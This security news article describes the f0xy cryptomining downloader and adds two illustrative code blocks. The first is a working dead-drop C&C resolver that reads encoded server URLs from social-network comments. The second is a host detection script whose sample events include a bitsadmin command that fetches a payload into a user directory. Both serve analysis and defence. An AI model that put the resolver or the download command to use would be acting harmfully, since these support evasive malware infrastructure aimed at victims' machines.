f0xy CPUminer malware improved with evasion techniques

Pierluigi Paganini January 31, 2015

Researchers at Websense are tracking the evolution of the financially motivated 'f0xy' malware, which has gained several new features since it was first spotted.

Security experts at Websense have spotted a new strain of malware, dubbed "f0xy", that leverages legitimate websites and web services to carry out its malicious activity. The first f0xy sample Websense found is dated January 13, 2015, but the experts confirmed that the malware has been improved since then: f0xy originally ran only on Windows Vista and later versions of Windows, whereas recent variants also work on Windows XP.

The name f0xy was chosen because this string appears in the file names and the registry value the malware creates:

File Names
%appdata%\Microsoft\svchost.exe
%appdata%\Microsoft\f0xyupdate.exe
%appdata%\Microsoft\Bot_ID
Registry Keys
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Name: f0xy

f0xy code

f0xy can dynamically change its command-and-control (C&C) server and can download and execute arbitrary files. Its authors have paid particular attention to evasion techniques that hide the malicious code from both victims and security vendors.

When the researchers first analyzed a sample of the dropper, only 5 of the antivirus engines on VirusTotal detected it. At the time of writing the detection rate has risen to 24 of 57 engines, which still leaves more than half of them missing it.

“Websense Security Labs have discovered a new and emerging malware downloader that employs evasion techniques and downloads a cryptocurrency miner. The new malware, which we have named ‘f0xy’, is able to dynamically change its command-and-control (C&C), and download and execute arbitrary files. More interestingly, f0xy’s evasion tactics include leveraging the popular Russian social networking site VKontakte, and employing Microsoft’s Background Intelligent Transfer Service to download files.” Websense researcher Nick Griffin explained in a blog post.

The technique f0xy uses to change its C&C dynamically is of particular interest: the malware points to a specific VKontakte profile, and the operators post the URL of the command-and-control server there as a comment, in encoded form. The binary therefore carries no hard-coded server address; to move infrastructure the operators only have to post a new comment, and the request that fetches it goes to a legitimate, widely used site rather than to attacker-owned infrastructure.
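The following is an added illustration of the dead-drop resolver pattern described above; it is not f0xy's code. The article only states that the C&C URL is posted as an encoded comment on a VKontakte profile, so the HTML layout of the page, the `f0xy:` marker and the use of base64 are assumptions made for the demo, and the profile page and addresses (RFC 5737 documentation ranges) are constructed.

```python
"""Dead-drop C&C resolution of the kind described above.

Added illustration, not f0xy's code: the page only says that the C&C URL is
posted as an encoded comment on a VKontakte profile.  The HTML layout, the
'f0xy:' marker and the base64 encoding are assumptions made for the demo,
and the profile page below is constructed (RFC 5737 documentation IPs).
"""
import base64
import re
from urllib.parse import urlparse

MARKER = "f0xy:"  # assumed tag that marks the operator's comment
COMMENT_RE = re.compile(r'<div class="wall_post_text">(.*?)</div>', re.S)


def _b64(text: str) -> str:
    return base64.b64encode(text.encode("ascii")).decode("ascii")


# Constructed stand-in for the profile page a real resolver would fetch over HTTP.
SAMPLE_PROFILE_PAGE = "\n".join([
    '<div class="wall_post_text">hello from a perfectly ordinary profile</div>',
    '<div class="wall_post_text">f0xy:' + _b64("http://203.0.113.10/gate.php") + '</div>',
    '<div class="wall_post_text">f0xy:!!garbage!!</div>',                          # not base64
    '<div class="wall_post_text">f0xy:' + _b64("ftp://198.51.100.9/") + '</div>',  # wrong scheme
    '<div class="wall_post_text">f0xy:' + _b64("http://198.51.100.7/gate.php") + '</div>',
])


def decode_candidate(token: str):
    """Return the URL hidden in one comment token, or None when it is not a
    well-formed http(s) URL.  A malformed or decoy comment must not crash the
    resolver, otherwise a single bad post would take down the whole botnet."""
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None
    parts = urlparse(raw)
    if parts.scheme in ("http", "https") and parts.netloc:
        return raw
    return None


def resolve_c2(page_html: str, marker: str = MARKER):
    """Scan the profile's comments and return the last valid C&C URL.

    Taking the last entry assumes comments are rendered oldest-first; the
    operators then rotate servers simply by posting a new comment, without
    touching the binaries already deployed."""
    found = None
    for body in COMMENT_RE.findall(page_html):
        body = body.strip()
        if body.startswith(marker):
            url = decode_candidate(body[len(marker):])
            if url:
                found = url
    return found


if __name__ == "__main__":
    print(resolve_c2(SAMPLE_PROFILE_PAGE))  # http://198.51.100.7/gate.php
```

For the defender the consequence is that blocking the current C&C address buys very little, since the next comment moves it. The more durable signals are a non-browser process fetching a social-network profile page, and the repeated marker-plus-encoded-blob pattern in the comments themselves.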

Once the f0xy downloader is on a machine, it abuses the Microsoft Background Intelligent Transfer Service (BITS) to download its payload. The choice is effective because BITS is a legitimate Windows component for transferring files between a client and a server using idle network bandwidth, and a download it performs is not treated as suspicious by antivirus products. The transfer is carried out by the BITS service itself rather than by the dropper, so the network activity originates from a trusted Windows process.

“The f0xy downloader calls upon bitsadmin.exe to download its payloads, which is the Microsoft Background Intelligent Transfer Service (BITS). BITS provides a way of using idle bandwidth to perform file transfers, meaning that bandwidth requirements from other applications are not interrupted or interfered with. Many Windows services rely upon this service, including Windows Update and Windows Defender.” continues the post.
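The block below is an added example of host-side detection logic for the behaviours described in the BITS paragraphs above and for the file and registry indicators listed earlier on the page; it is neither Websense's detection logic nor the malware's code. The events are constructed Sysmon-style records (process creation and registry value set) with made-up user names, file names and an RFC 5737 address.

```python
"""Host-side detection for the behaviours described above.

Added example, not Websense's detection logic or the malware's code.  The
events are constructed Sysmon-style records (process creation and registry
value set) with made-up user names, file names and an RFC 5737 address; the
file and registry indicators are the ones listed earlier on the page.
"""
import ntpath
import re

# Indicators from the article, as path suffixes so any user profile matches.
IOC_FILE_SUFFIXES = (
    r"\appdata\roaming\microsoft\svchost.exe",
    r"\appdata\roaming\microsoft\f0xyupdate.exe",
    r"\appdata\roaming\microsoft\bot_id",
)
IOC_RUNONCE_VALUE = "f0xy"

SYSTEM_DIRS = (r"\windows\system32", r"\windows\syswow64")
USER_WRITABLE = (r"\appdata\roaming", r"\appdata\local\temp", r"\users\public")
URL_RE = re.compile(r"https?://\S+", re.I)


def check_process(ev: dict) -> list:
    """Alerts for one process-creation event as (severity, message) tuples."""
    alerts = []
    image = ev["image"].lower()
    cmd = ev.get("cmdline", "").lower()
    name = ntpath.basename(image)

    # The real svchost.exe only lives in a system directory; f0xy's copy sits in %appdata%.
    if name == "svchost.exe" and not ntpath.dirname(image).endswith(SYSTEM_DIRS):
        alerts.append(("high", "svchost.exe outside a system directory: " + ev["image"]))

    # bitsadmin.exe fetching a URL; writing into a user-writable directory is the worst case.
    if name == "bitsadmin.exe" and ("/transfer" in cmd or "/addfile" in cmd) and URL_RE.search(cmd):
        sev = "high" if any(d in cmd for d in USER_WRITABLE) else "medium"
        alerts.append((sev, "bitsadmin download: " + ev.get("cmdline", "")))

    if image.endswith(IOC_FILE_SUFFIXES):
        alerts.append(("high", "known f0xy file path: " + ev["image"]))
    return alerts


def check_registry(ev: dict) -> list:
    """Alerts for one registry-value-set event on the Run/RunOnce keys."""
    key = ev["key"].lower()
    if not key.endswith((r"\currentversion\run", r"\currentversion\runonce")):
        return []
    if ev["value_name"].lower() == IOC_RUNONCE_VALUE:
        return [("high", "f0xy RunOnce value -> " + ev["data"])]
    if any(d in ev["data"].lower() for d in USER_WRITABLE):
        return [("medium", "autorun from user-writable path: " + ev["data"])]
    return []


def scan(events: list) -> list:
    """Run every event through the matching check and collect the alerts."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            alerts.extend(check_process(ev))
        elif ev["type"] == "registry":
            alerts.extend(check_registry(ev))
    return alerts


# Constructed sample timeline: two benign events around an f0xy-style infection.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\svchost.exe",          # benign BITS host
     "cmdline": "svchost.exe -k netsvcs", "parent": r"C:\Windows\System32\services.exe"},
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",        # dropper -> bitsadmin
     "cmdline": r"bitsadmin /transfer upd /download /priority high "
                r"http://203.0.113.10/payload.exe C:\Users\alice\AppData\Roaming\Microsoft\svchost.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\invoice.exe"},
    {"type": "process", "image": r"C:\Users\alice\AppData\Roaming\Microsoft\svchost.exe",  # fake svchost
     "cmdline": "svchost.exe", "parent": r"C:\Users\alice\AppData\Local\Temp\invoice.exe"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
     "value_name": "f0xy", "data": r"C:\Users\alice\AppData\Roaming\Microsoft\f0xyupdate.exe"},
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",        # admin staging a file
     "cmdline": r"bitsadmin /transfer stage /download /priority normal "
                r"http://intranet.example/agent.msi C:\Staging\agent.msi",
     "parent": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for severity, message in scan(SAMPLE_EVENTS):
        print(severity.upper(), message)
```

Two caveats apply. bitsadmin.exe is only one way to drive BITS; a dropper that calls the BITS COM API or the PowerShell cmdlets directly never spawns a bitsadmin.exe process, so the command-line rule is narrow and should be paired with the file-path and RunOnce checks, and with the Microsoft-Windows-Bits-Client/Operational event log, which records the remote URL of each job regardless of how it was created. The svchost.exe location rule is also the one most likely to catch the payload on hosts where the download itself was missed.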

The experts confirmed the financial motivation of the operators behind the f0xy campaign: the payload downloaded by the variant uncovered by Websense is a 64-bit build of CPUMiner, and the threat actors use the CoinMine.pw mining pool to coordinate the mining performed by the infected machines.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

Pierluigi Paganini

(Security Affairs – f0xy, malware)


